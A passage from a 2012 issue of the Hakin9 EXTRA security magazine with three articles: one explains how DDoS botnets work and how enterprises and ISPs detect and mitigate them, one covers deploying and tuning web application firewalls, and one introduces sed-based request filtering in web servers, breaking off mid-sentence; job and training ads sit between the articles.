A Distributed Denial of Service attack is a Denial of Service that is orchestrated by using many hosts or zombie machines that are scattered over the internet to target one victim. Typically these zombie machines have been previously hacked and have had DDoS malware installed. This malware allows an attacker to control these zombies from a control server. By adding this hierarchy, the attacker can cover their tracks instead of trying to launch the attack directly from their servers. Also, from a cost perspective it makes a lot of sense for an attacker to leverage existing hosts rather than trying to set up their own network of dedicated machines. These attacks are problematic because they are much more powerful than just a handful of hosts. In many cases, an attacker will harness a Botnet with 100000 hosts that are involved in the attack (Figure 1). In this DDoS architecture shown above, a command and control setup is used. A number of bots are infected with a piece of DDOS malware that allows for them to be remotely controlled. These Zombie machines are controlled by DDoS Controller machines. The attacker commands the DDoS Controller machines to instruct the Zombie machines on who to attack and how to perform the Denial of Service. In order to setup this architecture, an attacker must go through many steps. First of all, it must create the Botnet malware. If an attacker doesnt have the software development skills, they will use a publically available DDoS toolkit. The next step is to infect a large swath of machines with this malware. Classic approaches to installing malware on a machine are used: clicking on a malicious link, installing an application with the malware embedded in it and other exploits that can run malicious code on the machine are used. Often an attacker will scan large portions of the internet for an un-patched vulnerability and take advantage of it to load their malware. Once the malware has been installed, the Zombie machine communicates with the DDoS Controller. The source address of the DDoS Controller is often spoofed to further throw investigators off track. This communication is encrypted in some instances but in some instances it is not. The Controller to Zombie commu-

www.hakin9.org/en

15

Hakin9 EXTRA
DDoS Botnet Architecture

Attacker

Encrypted, IRC, HTTP, Peer to Peer or TCP, UDP Communications


DDoS Controller DDoS Controller DDoS Controller DDoS Controller

Encrypted, IRC, HTTP, Peer to Peer or TCP, UDP Communications


Zombie Zombie Zombie Zombie Zombie Zombie Zombie

Victim

TCP SYN Flood, HTTP Flood, DNS Flood, Slowloris Attack

Figure 1.

Source: [4] pp 40/43

nication in unencrypted instances uses ICMP echo response packets. These networks are also known to use IRC channels for communication. These communication mechanisms are used are because they often are allowed to traverse firewalls. More recent DDoS systems have been using peer to peer communication channels.

The rise of DDoS toolkits

In the past, Distributed Denial of Service attacks were done by lone hackers with protocol expertise and software development skills. This is unfortunately no longer the case. DDoS attacks are now orchestrated mainly by organized crime, political activists or amateur hackers. There are different ways in which these different actors setup and activate a DDoS attack. Organized crime will typically infect a large number of unknowingly host machines with malware. This malware will be commanded from specific controller machines. The hosts that are infected are known as Zombies. This approach differs from political activist hackers or Hacktivists as they are called. An example of this type of group is Anonymous. In the case of the Hacktivist, they will actually produce a toolset and have their sympathizers download and install it on their machine. Typically, groups like Anonymous will use social media to persuade their followers to take up the cause and download the tool to help execute the denial of service attack [20]. Examples of Anonymous DDoS tools are the Low Impact Ion Cannon (LOIC) or the High Impact Ion Cannon (HOIC). An even more recent trend is in the build your own DDoS Botnet segment of toolkit. This way, any person can set up their own Botnet and then sell their ability to launch DDoS attacks to others. There are numerous DDoS toolkits available. They can be found in hacker forums, advertised on youtube.com or even downloaded from paste.bin [10]. They

differ in their communication schemes, the Denial of Service exploits they perform and encryption of their communication channels. These are the tools of choice for the amateur hacker because they do not require any intricate knowledge of how to exploit a computer in order to generate a powerful DDoS attack. These DDoS Botnet toolkits in general use a few major modes of communication between their nodes. Some use custom protocols over TCP or over UDP. Some use ICMP in order to get through firewalls that allow it to pass through enterprise gateways. Others use protocols such as IRC or HTTP. When IRC is used as the communication channel, a bot will connect to a specific IRC server or list of servers that are hardcoded into the malware. Once it has connected to the IRC server, it will listen for commands or monitor a specific channel for commands. Using IRC as a communication channel has declined in popularity though because it is relatively easy to filter on. For instance, the TCP port range for IRC communications of 6666-6669 can easily be blocked with an IDS rule. More recent Botnets have turned to HTTP as a communication protocol for command and control messages. With the volume of http traffic over most networks today, it is easier to hide these command and control messages [11]. Some DDoS toolkits also use encrypted communications to conceal these command and control messages. Some DDoS toolkits are smart about preventing tracing. They know that ISPs will typically trace a spoofed IP back, router interface by router interface to locate the source. However, this process takes time. Therefore, the DDoS Botnet will pulse the attack on and off over intervals of time [3 pp 538]. A new and somewhat alarming trend is the recent adoption of build your own DDoS Botnet solutions. These products which many security researchers group into the Dirt Jumper

16

9/2012 (16)

Understanding and Mitigating Distributed Denial of Service Attacks

family of DDoS Botnets are targeted towards hackers who want to stand up their own Botnet. The hackers motivation for using these toolkits vary but they range from wanting to bring down a competitive player in an online game through what is called host booting to helping one company try to run their competitor out of business by making their website unavailable [12]. One thing that makes this class of DDoS toolkits so troubling is that the source code is also available which makes it possible to create spin offs of the original. This is why Dirt Jumper is considered more of a family of DDoS toolkits rather than a single toolkit. As these new DDoS toolkits become more commercialized and require higher levels of development, they become more susceptible to exploitable code. Ironically, the best way to defeat a command and control based DDoS Botnet is to attack it using well known hacking methods such as buffer overflows and SQL Injection attacks. It was reported recently that the Dirt Jumper family of DDoS Botnet toolkit is susceptible to SQL Injection attacks against a control node. Once compromised, it is possible to gain access to the database behind the control node to shutdown the DDoS Botnet [13]. This is a much easier approach to take than trying to shutdown every individual Zombie machine of a large DDoS Botnet.

reducing the incidence of DDoS Attacks

The current architecture of the internet makes it nearly impossible to quickly stop a large DDoS attack. Multiple ISPs and law enforcement typically need to be involved to shutdown a large DDoS Botnet. However, there are some steps that Enterprises can take to minimize the risk of their machines being involved in such an attack. If these steps proliferate across the internet, the incidence of DDoS attacks will decline. Keep your hosts up to date with the latest security patches. The first step in setting up a DDoS Botnet is to infect an army of hosts and turn them into zombies. The way this occurs is by exploiting published and well known compromises. Make this harder for an attacker by religiously installing software patches as they become available. Do not run more services than are typically required. The larger the attack surface, the larger the probability of a compromise [3]. Do not grant users more privileges than they need to do their job. Look for suspicious port scan activity. Scans for known vulnerabilities are a known first step in the setup of a DDoS Botnet. Survey your network traffic for unexpected service traffic from certain hosts to unknown public servers. This could be an indication of Zombie hosts on your network that are contacting command and control servers. Look for instances of IP spoofing on your network. For example, source addresses that dont match internally allocated addresses could indicate a problem. Look for large flow volumes of traffic or really long flows. This can be done by deploying a Netflow probe at the networks egress point to monitor flow volume. Both of these cases could be a Denial of Service effort.

this section, we will discuss how these technologies work and where on the network they would typically be deployed. There are two classes of these solutions: The first class is deployed in front of a server that requires high availability and thus needs protection from Denial of Service attacks. These solutions are typically probe based and require a person to manage them onsite. They generally do not have a monthly fee associated with them. They also cannot prevent a denial of service from depleting bandwidth upstream from the server being protected. The Arbor Networks Pravail system is an example of such a solution. It actually can work in two different areas: in front of critical servers or as part of an ISPs DDoS protection. When placed in front of a critical server, the Pravail probe will look for application layer denial of service attacks (HTTP, DNS, SSL and VOIP) and also look for DDoS Botnet communication. Pravail links to Arbor Networks threat intelligence to find the latest Denial of Service and Botnet communications [14]. Corero Network Security also provides a probe that is similar in deployment and function. It is called Corero DDS and is deployed similarly [15]. The second class of solutions are called cloud based DDoS protection or Managed Protection. In this class of solution, the provider will reroute a customers traffic to their servers as a first line of defense. Imperva offers a cloud based DDoS protection service. This service basically routes a customers web traffic through Impervas DDoS protection service by changing a DNS entry. They claim to support up to 4 Gbps of customer traffic [16]. This has the obvious advantage of not requiring any customer premise equipment and not needing dedicated staff to operate the service. Another advantage is that the customer does not need to overprovision their network resources which is another method that organizations use to protect their online resources. Imperva is not the only company to take this approach as Verisign also has a similar cloud based DDoS protection system available [17]. Akamai also offers a similar managed service called DDoS Defender [18]. Many service providers offer their own DDoS protection at the network level which is an ideal place to protect your network because they can impact upstream routers by communicating with other service providers. The correct solution for your organization depends on numerous factors: The type of uptime you require and the cost of downtime. Cloud based DDoS solutions involve a recurring cost but have a lower upfront cost. The probe based DDoS protection will require ongoing management and does not necessarily prevent points upstream from the probe from being congested. Therefore, both protection paradigms should be carefully considered before committing to one or the other.

How Does an iSP Track a DDoS Attack?

commercial Available Anti-DDoS Solutions:

There are numerous advertised commercially available today from vendors such as Arbor Networks, Imperva, Corero Network Security and Akamai technologies along with many others. In

As discussed earlier, there are many different types of Denial of Service attacks. When an attack occurs, an ISP will receive an alarm that a customers service level agreement is not being met. This could be because their link is saturated with unwanted traffic. The ISPs first step is to figure out what type of attack it is. One way that this can be done is by using tcpdump to capture network traffic. Then one can run the tcpdstat tool to gather summary statistics on this sample of traffic [19]. Another way that this can be accomplished by an ISP setting up access lists for various services on their routers. Once they have determined how which of the various types of DDoS attack it was, the next step is to throttle that specific type of traffic. There are many different types of DDoS attacks, be they TCP SYN floods, ICMP

www.hakin9.org/en

17

Hakin9 EXTRA
based or UDP based. Therefore, we need to know exactly which mechanism the attacker is using before we can start to mitigate the damage. The following ACL rules will help us to discover the appropriate type of attack: access-list 169 permit icmp any any echo access-list 169 permit icmp any any echo-reply accesslist 169 permit udp any any eq echo access-list 169 permit udp any eq echo any access-list 169 permit tcp any any established access-list 169 permit tcp any any access-list 169 permit ip any any interface serial 0 ip access-group 169 in Source: [19] Another mechanism that can be used to determine the type of attack is by using Netflow. Netflow is a mechanism to report on sets of packets. A flow is actually a set of a packets between a given sender and receiver on a set of ports. Netflow reports flow summaries including the number of packets in the flow as well as layer 3 and layer 4 information. From these Netflow reports, we can determine if there is an increase in either the number of flows or the volume of the flows. Either can indicate a denial of service attack. Many routers support Netflow inherently thus is a useful mechanism. Most ISPs will actually use Netflow to monitor service level agreements along with SNMP so it serves a dual purpose. Once an ISP has determined the type of traffic that is attacking the victim, the next step is mitigating its effect. Since there are so many senders in a DDoS attack and they are using spoofed addresses, we would need to back track through many routers using a combination of the MAC address and router interface that the packet was received on to trace back to the attacker [19]. This would need to be repeated for many zombies if they are geographically diverse and numerous. This not only requires cooperation of many ISPs, it also requires time. Note that a DDoS attack is very costly to an organization when the server being attacked is one that generates revenue 24/7. Any downtime of this server costs significant amounts of money. Therefore, most ISPs will first try to mitigate the damage by setting up an access control list to throttle the specific Denial of Service traffic. For example, perhaps ICMP packets are the attack method so the ISP will immediately rate limit them to alleviate problems at the victim until the attacker is found. In order to really help the victim, the offending traffic needs to be stopped further up the chain than at their Enterprise IDS or even their border gateway router because at this point much of their bandwidth has been consumed. It becomes clear that to really mitigate a DDoS attack with any success, you must coordinate with your ISP. Therefore, a clear plan of attack in terms of who exactly at the ISP to call in the case of a DDoS attack should be established. As you can see, DDoS attacks are extremely difficult to stop based on the current architecture of the internet. As an operator of a corporate or enterprise network, there are some steps that one can use to lower the chance that your network will be the source of such an attack. First of all, you should monitor your network for evidence of spoofed source addresses. There are commands on routers to verify Unicast IP address sources to prevent spoofed addressing from your network. Another check is to make sure that reserved IP addresses that are not allocated on your network are not transmitting large volumes of traffic. Finally, try to ensure that your systems are patched for various exploits. This goes a long way to ensuring your machines arent inadvertently comprised to act as part of a DDoS Botnet.

conclusion

DDoS attacks are some of the most troubling attacks on the internet because they are extremely costly to defend against in terms of both time and money. Unfortunately, they are very inexpensive to orchestrate even for a novice attacker based on the availability of DDoS Botnet toolkits. Therefore, we have not seen the last of these attacks and there is evidence to suggest they are accelerating. Some best practices to prevent DDoS attacks are to make sure your hosts have been patched with the latest security updates and to verify that your network is not sending spoofed traffic or excess traffic. Further, an organization may consider purchasing a dedicated DDoS protection probe to better guarantee availability of a server but the more robust solution is to mitigate the problem at the ISP level. For high availability servers, a cloud based DDoS protection service may be an effective and fast solution to deploy. Enterprises should also discuss with their ISP to understand the services they offer to prevent DDoS attacks.

HAri koSArAjU
has over 10 years of software engineering experience focused on Linux Application Development in C/C++, Real Time Embedded Systems, Protocol Design and Deep Packet Inspection. He is currently a lead engineer on the Mantaro SessionVista product line of Network Intelligence Technology. This product line is used for Network Forensics, Lawful Intercept and Cyber Security through industry leading deep packet inspection at high data rates. Haris interests lie in understanding network based threats and developing the technologies to detect and stop them. Hari holds a bachelors degree in Systems and Computer Engineering from Carleton University in Ottawa, Canada. He also completed a joint MBA/MS at the Robert H. Smith School of Business at the University of Maryland, College Park.

References:
[1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16] [17] [18] [19] [20]

[http://www.informationweek.com/security/attacks/ddos-targeting-firewalls-intrusion-preve/229200274] [Inferring Internet Denial-of- Service Activity, David Moore, Geoffrey M. Voelker and Stefan Savage. http://www.caida.org/publications/papers/2001/BackScatter/usenixsecurity01.pdf.] [ Counter Hack Reloaded. Ed Skoudis and Tom Liston. Prentice Hall. 2006] [ An Introduction to DDoS Attacks and Defense Mechanisms. BB Gupta. Lambert Academic Publishing. 2011] [http://en.wikipedia.org/wiki/Smurf_attack] [http://en.wikipedia.org/wiki/LAND] [http://en.wikipedia.org/wiki/Email_bomb] [http://en.wikipedia.org/wiki/Ping_of_death] [http://en.wikipedia.org/wiki/Slowloris] [http://www.securityweek.com/flaws-dirt-jumper-ddos-attacktool-let-defenders-fight-back] [http://tools.cisco.com/security/center/viewAlert.x?alertId=8127] [http://www.infosecisland.com/blogview/20997-Dirt-JumperDDoS-Botnet-Variants-Continue-to-Proliferate.html] [http://www.securityweek.com/flaws-dirt-jumper-ddos-attacktool-let-defenders-fight-back] [http://www.arbornetworks.com/pravail] [http://www.corero.com/en/products_and_services/dds/dds_ overview] [http://www.infosecurity-magazine.com/view/20580/imperva-introduces-cloudbased-ddos-protection/]. [http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/ddos/mitigation-services/index. xhtml] [http://www.akamai.com/html/solutions/ddos_defender.html] [http://www.symantec.com/connect/articles/closing-floodgates-ddos-mitigation-techniques] [http://www.pcmag.com/article2/0,2817,2400842,00.asp]

18

9/2012 (16)

IT Security Courses and Trainings


IMF Academy is specialised in providing business information by means of distance learning courses and trainings. Below you find an overview of our IT security courses and trainings. Certified ISO27005 Risk Manager Learn the Best Practices in Information Security Risk Management with ISO 27005 and become Certified ISO 27005 Risk Manager with this 3-day training! CompTIA Cloud Essentials Professional This 2-day Cloud Computing in-company training will qualify you for the vendorneutral international CompTIA Cloud Essentials Professional (CEP) certificate. Cloud Security (CCSK) 2-day training preparing you for the Certificate of Cloud Security Knowledge (CCSK), the industrys first vendor-independent cloud security certification from the Cloud Security Alliance (CSA). e-Security Learn in 9 lessons how to create and implement a best-practice e-security policy! Information Security Management Improve every aspect of your information security! SABSA Foundation The 5-day SABSA Foundation training provides a thorough coverage of the knowlegde required for the SABSA Foundation level certificate. SABSA Advanced The SABSA Advanced trainings will qualify you for the SABSA Practitioner certificate in Risk Assurance & Governance, Service Excellence and/or Architectural Design. You will be awarded with the title SABSA Chartered Practitioner (SCP). TOGAF 9 and ArchiMate Foundation After completing this absolutely unique distance learning course and passing the necessary exams, you will receive the TOGAF 9 Foundation (Level 1) and ArchiMate Foundation certificate.

For more information or to request the brochure please visit our website: http://www.imfacademy.com/partner/hakin9
IMF Academy info@imfacademy.com Tel: +31 (0)40 246 02 20 Fax: +31 (0)40 246 00 17

Hakin9 EXTRA

Web ApplICAtIon FIreWAll


From plAnnIng to deployment
yen Hoe lee And FernAndo perez

Web application firewall (WAF) has been around in the information security industry for more than a decade now. However its use is still not as widespread as desired.

everal reasons come into mind it is a relatively large investment for an IT shop, and the operation of it takes specialized skills that are currently not in abundance in the market. In the last couple of years, WAF is definitely growing to become more popular because of the need for compliance to standards and regulations such as the Payment Card Industry Data Security Standard (PCI-DSS). There is also a better awareness in general among IT professionals, of the threat vectors used for attacking the web application layer, and the need to protect against this class of attack. This article will focus on helping you plan a deployment and operation of WAF protections to your web applications starting from conception, planning, design, tests, deployment, and operation. If you have already deployed a WAF deployed, you could gain some insight into practices that you can incorporate in expanding your WAF coverage to more web application, or to improve the operation aspects of WAF.

Is a Web Application Firewall right for you?

Obviously, WAF protects web applications, especially Internet facing ones, from application layer exploits such as SQL Injection and Cross Side Scripting, among other exploits. However the type of applications may determine the effectiveness of WAF protection. For example, web application that is content management in nature requires either extensive tuning or removal of some WAF protection rules in order for the application to continue to function as design. In a defense in depth architecture, there would need to be more reliant on protection on other layers. In a situation like this, something other than a traditional WAF may be considered. A traditional WAF is one that sits in the span port off a network device (see Figure 2). There are some WAF technologies that would allow a more context aware protection of the application that does not sit in the span

port off a network device. This class of technology generally works this way there is a hook into the functions in memory of the application. The rest of the operations are similar to a traditional WAF - the request for data would be inspected and if it violates any rules, the request will be terminated. The advantage of this kind of WAF is, because it is not merely inspecting input data at the web request layer like a traditional WAF, it is more accurate in forestalling an imminent data leak due to exploits such as SQL Injection. The flip side is, the application has to run on a platform that lends itself to this kind of hook while both Microsoft .NET and Oracle Java platforms are well established platforms for this kind of hook, other platforms support should be examined carefully. Another consideration is compatibility with profiler. Profilers that generate performance data often used the same mechanism to hook into applications. If a profiler is running alongside, there should be compatibility test to ensure both runs together without glitches. If a web application is designed from the ground up with secure coding practice, and has passed extensive penetration testing, does it require a WAF? After all, WAF protects application layer vulnerabilities that application should mitigate anyway. Practically, that is an ideal state that often take tremendous resource to achieve all the time, but at the very least, WAF should help block probing type of traffic, and that would translate to a slight improvement to the load of the servers; the data that it logs could also be used as data for security analysis of web application traffic.

Choices between a traditional WAF, and a cloud based WAF

If you are thinking of using WAF to protect your web application today, there is one more option than a couple of years ago. Besides the traditional WAF that you can purchase and put it

20

9/2012 (16)

Web Application Firewall

into your data center, there is a cloud offering of web application firewalls. If you are a small or medium business and the web application presence is an important asset to the company, using the cloud based WAF will allow you avoid making one big investment and also avoid the operation cost of keeping in-house resources for operation and maintenance. There is an opportunity to choose from different cloud based WAF providers. It would be interesting to consider the other aspects around accessing WAF such as the fact that the application in some cases will be in a different hosting environment; however, this article will not go into choosing a cloud based WAF. This article will focus on helping you implement a WAF from concept to deployment and the continuous operation of this technology. Much of the material discussed is applicable to cloud based WAF as well.

not be tuned to a level where it could differentiate legitimate from the offensive ones, that rule may have to be lifted (or waived, turned off) so that the application could continue to function. If you have a small set of applications targeted for the proof of concept, obviously testing on these applications would help you make your decision. If you are protecting an enterprise with many different kinds of application, you may not get to test the WAF on every application. You should try to pick application based on the kind of input that is taking. This would be the suggestion on the kinds of application to pick Transactional application such as an online shopping application. Content management application or application allows editing of HTML pages. Off the shelf application that is deployed some customization only. Web Services

How to evaluate WAF

There are online resources available to help you get started with evaluating WAF products. There are a lot of criteria that are listed in The Web Application Firewall Evaluation Criteria (http://projects.webappsec.org/WAFEC-1-HTML-Version). This website has a spreadsheet that takes evaluates many aspect of WAF, such as the deployment architecture, detection and protection techniques, management and performance. If you send this document to major WAF vendors hoping that you could score and differentiate from their responses, you may be disappointed because most of the major vendors would be able to achieve most if not all the criteria set out. If you have a proof of concept phase where you put the technology to the test, there are really two high level areas that you could focus your evaluation: How fast the WAF product could be deployed to blocking mode. Blocking mode is where web request that violates rules will not be allowed to complete. The other mode is monitoring mode where the web request is inspected for violation but nothing else is performed. The flexibility of tuning rules to allow maximal coverage, and minimal waiver. Some legitimate web request may look like an offensive one that violates rules. If a rule can-

Each of these application types would give the WAF a different set of challenge to the two high level areas for evaluation stated earlier. The test would help you with a better understanding of the extent and limit of the protection of each of the WAF product under evaluation.

deploying your first application under WAF protection

Deploying a WAF protection for application should not be treated as merely the implementations of a tool; instead it should be treated as program. The WAF implementation should be a combination of activities designed to successfully meet the WAFs ultimate goal of providing an effective layer of protection for the organizations Internet facing web applications. At a minimum the WAF program should consider the following: WAF Models Operational Skills and Resources WAF Tuning Logging and Monitoring

Figure 1. Basic Network Layer Firewall Diagram

www.hakin9.org/en

21

Hakin9 EXTRA
It is important to understand the differences between a WAF and a network layer firewall. While both WAF and network layer firewall are policy enforcement points in the network, they inspect different layer of the traffic. A network firewall primary objective is to control the inbound and outbound network traffic by analyzing the data packets and determining whether it should be allowed or blocked. It creates a policy enforcement point between a segment of the network that is considered to be trusted or secured, and the Internet or another segment that may deemed insecure or high risk. A WAF inspects the OSI layer 7 traffic for violations based on a predefined security policy. It is used as a policy enforcement point between the organizations presentation layer and the web servers. A traditional, appliance-based WAF will be placed directly behind an organizations outmost firewall or network device like a switch or load balancer typically; and in front of the web servers. In some cases, WAF can be found as an additional module in some of the most popular commercial firewalls switches and load balancers, so a separate appliance is not needed. Blocking of specific file types; Defining expected length of an application request; and Blocking of specific parameters or characters that are not expected in the user input.

By using targeted policy checks in the WAF positive model and the negative model, there is a balance between the effectiveness of the WAF and the level of resources needed for tuning and supporting the tool.

operational resources

It is important to understand the set of skills needed to deploy and operate WAF protection for applications. While network and server administrators are important resources with the skill to participate in the deployment and the infrastructure support of the WAF, networking and server administration skills are not enough to run, manage and operate the WAF deployment and operation end-to-end. It takes a team with different skills to deploy and operate WAF protection for applications. An organization deploying WAF will need to involve at a minimum the following groups: Network Engineering This team will be responsible for managing the infrastructure supporting the WAF and potentially manage the operational aspect of the WAF. In some organizations this role may be performed by a Security Operations team. Information Security, specifically Application Security This team will define the policy configuration for the WAF. This team will review any suspicious web application requests identified as violations by the WAF, and be responsible for approving changes to the WAF rules. The security practitioners involved must be proficient in web application security and vulnerabilities. They should also have a good understand of the web application threat landscape. Application Development This team is often overlooked in the deployment of WAF. They provide the crucial information on what are legitimate web request, and what are not, since they have the most reliable knowledge about the application.

WAF models

There are generally 2 security models available in WAFs - the positive and the negative model. The positive model will white-list the application traffic to known, legitimate web requests only and block all other web request. Generally, this model will require more effort of tuning before going into blocking mode, but will provide a higher level of protection, than the negative model. From a resource perspective, this model requires more attention and processes built around it to ensure proper continual operation. With the positive model, every time the application changes, monitoring and tuning will be required to ensure that the WAF learns the new application traffic and changes to the application do not trigger violations. The negative model, on the other hand, will block web request only when it matches a black-list or signatures file. This model analyzes the web application requests against a predefined set of signatures that identify known web application attack vectors and vulnerabilities. These attack vectors are identified by different resources in the industry such as: research performed by industry groups such as: The SANS Internet Storm Center The Open Web Application Security Project (OWASP) research performed by the WAF vendor known attacks

These groups will need to work in collaboration, as an implementation team, in order to achieve a successful WAF implementation.

WAF tuning

These signature files are updated by the WAF vendor. It has some similarity to the way an antivirus system update its signature. Compare to the positive model, the negative model requires less effort in monitoring and tuning. This translates to less resources and time to deploy. A recommended approach to achieve a balance of effort and level of protection is to use a combination of the positive and negative models. This approach combines the use of the signature based protection (negative model) and targeted policy checks to filter based on criteria that the application team know would be unnecessary for the normal operation of the application (positive model). For example:

The WAF tuning process requires the WAF to be set to monitoring mode. In this mode, all web request traffic for the application is allowed through the web application firewall without blocking the traffic. The WAF is set to capture and report these violations. The WAF implementation team needs to review these violations, and choose to accept these violations as legitimate traffic, or choose to tweak the rules so that there will not be violations. This process is repeated until all violations are addressed. When a positive model is used, the tuning effort will always be higher. The complexity of the application will impact the level of effort needed also. In this case, the complexity is determined by the number of input, the type of input expected, and how dynamic the application pages are generated. A negative model requires less tuning effort comparatively. However, there needs to be careful consideration to ensure that vulnerability is not left unaddressed by relaxing signatures

22

9/2012 (16)

Web Application Firewall

that allows exploitation. It is important to remember that in a defense in depth architecture, application security vulnerability should still be addressed in the application itself. It is imperative that applications are developed or patched following secure coding guidelines. When using a hybrid model (positive and negative model), there will still be the need for tuning. However, it will not require as much time as a positive model only implementation. When tuning a hybrid model, the level of effort required for tuning will be impacted by the complexity of the application. Since the policy checks enforced are selected based on what is pertinent to the application, the tuning level of effort usually does not increase drastically. The assumption is during the tuning period, there should only be legitimate web request traffic. If the application is in a network environment that has penetration testing or other probing traffic running against the application, it will add to the complexity and effort of the tuning process. Given this assumption, it is best to do tuning of a WAF in a non-production environment. The non-production environment should resemble the production environment, but with access to the development team to generate application traffic to mimic legitimate production traffic. Usually regression testing can help generate the desired traffic. Some organizations may decide to use a pre-production environment, where there is Internet traffic, to ensure that an environment that resembles production is used during the tuning. However, this would often raise the level of effort because there needs to be evaluation of both legitimate and illegitimate traffic (attack or probes). The use of this environment should be after, not before, tuning is completed.

logging and monitoring

An important part of a WAF product is the capability of originating event logs. As part of the WAF implementation an event logging and monitoring process must be implemented. While the WAF should block most of the attack vectors coming for the application, monitoring the event logs generated can help determine if there are any threats occurring against the application. The use of a Security Information and Event Manager (SIEM) tool could simplify the monitoring of event logs for the WAF. Since a SIEM is often supported in a Security Operations Center (SOC), an Incidence Response team could help define security triggers to look for threats. Another benefit of reviewing the WAF event logs is that it can help identify possible issues in the application code or logic or simply poor practices by the application development. As an example, consider the following scenario: An application team opens a trouble ticket reporting that a needed application request has been blocked by the WAF. When reviewing the event logs collected it is noted that the web application request blocked, was triggered by a directory traversal attack vector. When the information security team inquired the application team of this requests, the application team discloses that this is a built-in functionality of the application that allows the use of directory traversal via a user input field. This is an inherently high risk behavior for a web application. It would not have been discovered unless the event logs are monitored and reviewed.

The success of a WAF program could have unintended consequences. Now with the WAF in place ALL of our problems with application security are resolved. In a defense in depth architecture, this is a self-defeating proposition. Defining an operational process that will support WAF can be another challenge. First, a WAF policy or standard must be defined to ensure that the guiding principles around WAF are set in the organization. Secondly, it is important to involve the appropriate team to support and manage not only the WAF infrastructure, but the expansion of coverage of WAF to applications. Thirdly, the organization must ensure that the teams involved work in collaboration to properly define the processes, procedures, roles and boundaries of the WAF program. Finding the best protection model for your application landscape could be a challenge. The following questions should serve as a guide to help with this challenge: What is the organizations application universe? How complex are the applications in this universe? Does the organization have the expertise and skills needed to deploy and support the WAF? Does the organization have the right amount of resources to support the WAF? While a WAF will protect against the majority of application security threats, there will be one threat that the WAF may not be able to protect against. This threat is undetected application defects and logical flaws. This part can only by mitigated by ensuring that proper development testing is performed prior to production rollout. Testing should include at a minimum QA testing, user acceptance testing, security source code reviews, web application security assessments and exploitation testing via web application penetration analysis. WAF tuning may help to protect defects and logical flaws once these are discovered and known, but this should always be considered a temporary solution.

Challenges in deploying WAF

Conclusion

WAF is an important application security tool that would raise the security posture of an organization. However, its deployment would involve a cross-disciplined team of resources that often would not otherwise have reasons to work closely together. It is not only important to select the right tool for the job, but also setup the right organization and work flow that would support the expansion of coverage of WAF protection beyond a few web applications.

yen Hoe lee


CISSP, CSSLP is currently a Director of Security Solutions Architecture at a Fortune 100 Healthcare Company in the US. He has more than 10 years of Information Security experience in many large organizations in US and Europe.

FernAndo perez
is currently a Manager of Application Security Architecture at a Fortune 100 Healthcare Company in the US. He has more than 10 years of Information Security experience, and a former PCI Qualified Security Assessors (QSA).

www.hakin9.org/en

23

Now Hiring
Teamwork Innovation Quality Integrity Passion

Compliance, Protection
and

Sense of Security

Sense of Security is an Australian based information security and risk management consulting practice. From our offices in Sydney and Melbourne we deliver industry leading services and research to our clients locally, nationally and internationally. Since our inception in 2002, our company has performed tremendously well. We thrive on team work, service excellence and leadership through research and innovation. We are seeking talented people to join our team. If you are an experienced security consultant with a thorough understanding of Networking, Operation Systems and Application Security, please apply with a resume to careers@senseofsecurity.com.au and quote reference PTM-TS-12.

info@senseofsecurity.com.au www.senseofsecurity.com.au

Hakin9 EXTRA

Web Server SeD FiLtering


CoLin renouF

The principles underlying a good security solution are that it should be multi-layered, consider each component as being at risk in itself, and should consider all of the components interacting together as a whole as both the solution and an area of potential exploitation. It is this last principle that is often neglected.
n this article, and the related ones to follow, we will consider some new additions that can be applied to some of the layers to provide both local and distributed protection, and that are flexible enough to allow immediate tuning to protect against many newly found industry vulnerabilities before official fixes are available. The aim of all of these articles is to introduce a flexible and powerful distributed security solution that will fit into almost any environment.

Distributed Layers

Most web-based systems these days consist of a number of common layers that can essentially be considered standard commodities configured and used the same way in all environments. One of the most common eCommerce deployment architectures builds upon an application server probably written in Java using some servlet engine that builds upon the Apache Tomcat reference implementation to add additional features, e.g. web service standards support, clustering and management facilities. More recently, for media and some simple sites PHP based technologies are growing in importance and there are examples on the web of the configuration (although not the security filtering technique) for PHP deployments. Knowledge of the deployment architecture gives inroads to the mischievous or criminal fraternity to more easily explore the vulnerabilities that may exist in the environment. This may start with the simple task of using a search engine to look up known vulnerabilities, or for open source based products examining the source code. With PHP there are many avenues of attack documented, but due to the lesser prevalence of documented Java engine exploits systems administrators often feel safer than they should; ignoring the easy approaches to reverse engineering Java code using tools such as jad, or the Java JVM class:verbose, and reflection features. Assuming safety in todays world is foolish, so various techniques are implemented by the astute security administrator. One important thing to note, however, is that C represents strings as character arrays, usually with 8 bit ASCII characters, terminated with a NULL character. Java uses Unicode and under the covers stores the length of the String. The machine

may represent the individual bytes in one ordering and the network in another, i.e. Big ended or little endian. These different representations can be used by the clever hacker to produce an attack that makes use of the data representation conversions that take place on the boundaries to bypass security in one layer by relying on the conversion going on behind it to create an attack string. We will cover this in another article; but the thing to understand is that each layer must have its own defences and not rely entirely on what sits in front of it. Many attacks often come from within the external firewalls, e.g. from staff, so even in a simple case where the same technologies are used throughout and no conversion occurs defences are still needed in each layer. Commonly, SQL Injection attacks are used to get unauthorized access to data in the database and cross-site scripting (XSS) attacks are used to embed scripts into web pages to exploit unsuspecting users. Thus, these two threats must be countered to reduce related vulnerabilities. It is within this context that the sed filtering capabilities of the web server layer are introduced. Essentially, this layer introduces regular expression filtering into the request and response flow into and out of the web server layer. In a another article we will examine similar facilities in the Java application server layer in Java servlet filters, and look at techniques to ensure the request-responses pairs stay related. Here, the web server layer; usually written in C and derived from earlier Apache or Netscape httpd implementations with plug-in modules to extend them, will be our focus. There have been filtering functions within web servers for a while, but this article will concentrate on the recent related sed SAF filter (for iPlanet and derivates) and mod_sed filter (for Apache and defivatives) that implement the Unix stream editor SED functionality in a plugin module for the web server itself to provide considerable functionality for checking and manipulating web server requests and responses. For example, it would be possible to check for credit card patterns being displayed on a web page and obfuscate them to meet the Payment Cards Industry (PCI) objectives. The sed filter functionality is based on the Solaris 10 sed, stream editor, executable source code, which processes one

26

9/2012 (16)

Web Server SED Filtering

or more basic regular expressions as part of a script. Actually, its a little more complex than this as there are two different sed implementations on Solaris, one from the BSD compatible implementation, which is used in the Apache mod_sed content filter, and the other a new pure post SVR4 implementation, as used in the Oracle iPlanet Web Server 7 (formerly Sun Java System Web Server 7) sed filter implementation. The Apache version is written to the Apache APR portable module functionality, and the Oracle iPlanet Web Server is written to the NSAPI module functionality. The basic regular expression support, rather than the extended regular expression support, includes branching and saving of a buffer for later use. To change the string Hello to Goodbye anywhere in a line with the traditional sed functionality with a basic regular expression the command
